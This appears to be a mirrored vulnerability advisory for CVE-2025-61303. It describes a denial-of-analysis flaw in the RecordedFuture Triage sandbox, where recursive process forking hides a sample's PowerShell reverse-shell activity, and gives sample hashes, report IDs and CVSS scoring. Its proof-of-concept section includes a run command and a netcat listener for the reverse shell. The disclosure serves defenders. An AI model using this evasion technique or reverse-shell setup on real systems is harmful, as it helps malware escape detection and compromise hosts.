关联漏洞
描述
RecordedFuture Triage dynamic analysis engine can fail to record malicious behavior when samples produce very high-volume recursive process forking, causing inconsistent or missing behavioral reports.
介绍
# CVE-2025-61303 - RecordedFuture Triage: Denial-Of-Analysis via Recursive Process Forking
## Description
RecordedFuture Triage Sandbox Windows 10 build 2004 and Windows 10 LTSC 2021 contains a vulnerability in its Windows behavioral analysis engine that allows a submitted malware sample to evade detection and cause **denial-of-analysis**. The vulnerability is triggered when a sample recursively spawns a large number of child processes, generating high log volume and exhausting system resources. As a result, key malicious behavior, including PowerShell execution and reverse shell activity, may not be recorded or reported, misleading analysts and compromising the integrity and availability of sandboxed analysis results.
---
## Authors / Researchers
- **Evgenios Gkritsis** — Department of Informatics, Athens University of Economics and Business, Greece
- **Constantinos Patsakis** — Department of Informatics, University of Piraeus, Greece
- **George Stergiopoulos** — Department of Informatics, Athens University of Economics and Business, Greece
---
## Details
The sample `vathos_rev.exe` (SHA256: `3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b`) demonstrates a **denial-of-analysis** condition in RecordedFuture Triage’s Windows behavioral analysis engine.
When detonated under Windows 10 configurations, the sample recursively spawns thousands of child processes, exhausting process-tracking and logging resources. As a result, the sandbox reports minimal behavioral data and fails to record key malicious actions.
---
### Windows 10 v2004 Environment
- **Platform:** `win10v2004-20250610-en`
- **Architecture:** `x64`
- **Max time kernel:** `104s`
- **Max time network:** `213s`
- **Reported behavioral score:** `1/10`
- **Detected signature:** “Suspicious use of WriteProcessMemory” (64 IoCs)
- **Observed behavior:**
- Continuous process recursion of `vathos_rev.exe`
- No PowerShell execution or reverse-shell activity recorded
- Limited network traffic (only standard DNS and HTTP requests)
- No C2 callbacks or payload telemetry captured
---
### Windows 10 LTSC 2021 Environment
- **Platform:** `win10ltsc2021-20250619-en`
- **Architecture:** `x64`
- **Max time kernel:** `105s`
- **Max time network:** `215s`
- **Reported behavioral score:** `1/10`
- **Detected signature:** “Suspicious use of WriteProcessMemory” (64 IoCs)
- **Observed process activity:**
- Continuous process recursion of `vathos_rev.exe`
- No PowerShell execution or reverse-shell activity recorded
- Limited network traffic (only standard DNS and HTTP requests)
- No C2 callbacks or payload telemetry captured
Across both Windows 10 sandbox environments, the detonation failed to capture the expected PowerShell execution and reverse-shell stages despite the malware executing these behaviors on the host.
The sandbox’s behavioral analysis engine became saturated by recursive process spawning, resulting in truncated or missing telemetry.
This confirms a **denial-of-analysis** vulnerability, the behavioral engine fails to report malicious activity under high recursion and log volume, leading to false negatives and incomplete forensic output.
**Public report reference:**
https://tria.ge/250822-qfystshk51
---
## Impact
This is a **denial-of-analysis** vulnerability in RecordedFuture Triage that can cause the dynamic analysis engine to fail to capture or report behavioral activity. Exploitation allows adversaries to bypass behavioral detection and produce incomplete or missing analysis reports.
**Key impacts**
- **Detection Evasion:** Malicious behavior may be unrecorded, causing threats to appear benign.
- **False Confidence:** Low-scored analyses with missing telemetry can mislead analysts.
- **Reusable Evasion:** Technique can be embedded in loaders/droppers and reused across campaigns.
- **Ease of Exploitation:** Reproducible without deep expertise, increasing risk for mass abuse.
**Downstream consequences**
- Missed IOCs
- Misclassification of advanced threats
- Incomplete forensic timelines
---
## Affected Products
- **Product:** RecordedFuture Triage (Dynamic Analysis Platform)
- **Affected Component:** Windows Behavioral Analysis Engine
- **Malware Sample:** `vathos_rev.exe`
- **SHA256:** `3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b`
- **MD5:** `dca2fc8f69f6493c7a9c1ce9a68b2454`
- **SHA1:** `9b4688ba4788e34bce47d91b0accc98d33dbf8d2`
- **SHA512:** `924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b`
- **Size:** `270 KB`
### Observed Vulnerable Detonations (Public Triage Reports)
#### Windows 10 LTSC 2021 Environment
- **Report ID:** [`250822-qfystshk51`](https://tria.ge/250822-qfystshk51/behavioral2)
- **Platform:** `win10ltsc2021-20250619-en`
- **Architecture:** `x64`
- **Submitted:** `2025-08-22 13:12 UTC`
- **Reported:** `2025-08-22 13:18 UTC`
#### Windows 10 Version 2004 Environment
- **Report ID:** [`250822-qfystshk51`](https://tria.ge/250822-qfystshk51/behavioral1)
- **Platform:** `win10v2004-20250610-en`
- **Architecture:** `x64`
- **Submitted:** `2025-08-22 13:12 UTC`
- **Reported:** `2025-08-22 13:18 UTC`
> **Note:** Engine build and internal version details are not publicly exposed by RecordedFuture.
> All observations are based on reproducible public detonations from RecordedFuture’s Triage platform (submission `250822-qfystshk51`).
---
## Proof Of Concept (PoC)
### Summary (brief)
The supplied demo reproduces the denial-of-analysis (DoA) condition by generating very high process volume and deeply nested runtime activity. The demo spawns many child processes and performs multi-round XOR decryption before a final PowerShell reverse-shell stage. In vulnerable Triage Windows 10 images the final payload stage is not recorded or is truncated, while other images (e.g., Windows 11) capture the full behavior.
**How to run**
```bash
poc/vathos_demo.exe <IP> <PORT>
```
Start a listener (e.g., `nc -lvp 4444`) on the specified IP/port to observe attempted connections. The demo spawns a very high number of processes and performs multi-round XOR decryption, culminating in a PowerShell reverse-shell stage. In affected Triage configurations the final payload stage may not be recorded despite the sample executing it on the host.
Figure 1 - Triage overview dashboard
Figure 2 - Windows 10 v2004 behavioral report (minimal telemetry / DoA example)
Figure 3 - Windows 10 LTSC 2021 behavioral report (minimal telemetry / DoA example)
Figure 4 - Example processes logged in Windows 10 LTSC (sanitized, *not all* processes logged) — analysis logs → Processes
---
## Severity
Assessed with **CVSS v3.1**:
- **Attack Vector:** Local
- **Attack Complexity:** Low
- **Privileges Required:** Low
- **User Interaction:** None
- **Scope:** Unchanged
- **Confidentiality:** None
- **Integrity:** None
- **Availability:** Low
**Estimated CVSS v3.1 vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`
**Estimated base score:** **4.0 (Medium)**
---
## References
- Public Triage analysis: https://tria.ge/250822-qfystshk51
---
文件快照
[4.0K] /data/pocs/527156e54babec26befd9b03804e5b87fadba629
├── [4.0K] poc
│ ├── [ 456] details.txt
│ ├── [2.1K] encrypt.py
│ ├── [2.6K] onion.c
│ └── [243K] vathos_demo.exe
├── [7.4K] README.md
├── [4.0K] screenshots
│ ├── [ 97K] triage-01.png
│ ├── [135K] triage-02.png
│ ├── [137K] triage-03.png
│ └── [134K] triage-04.png
└── [464K] triage-report-250822-qfystshk51.pdf
2 directories, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。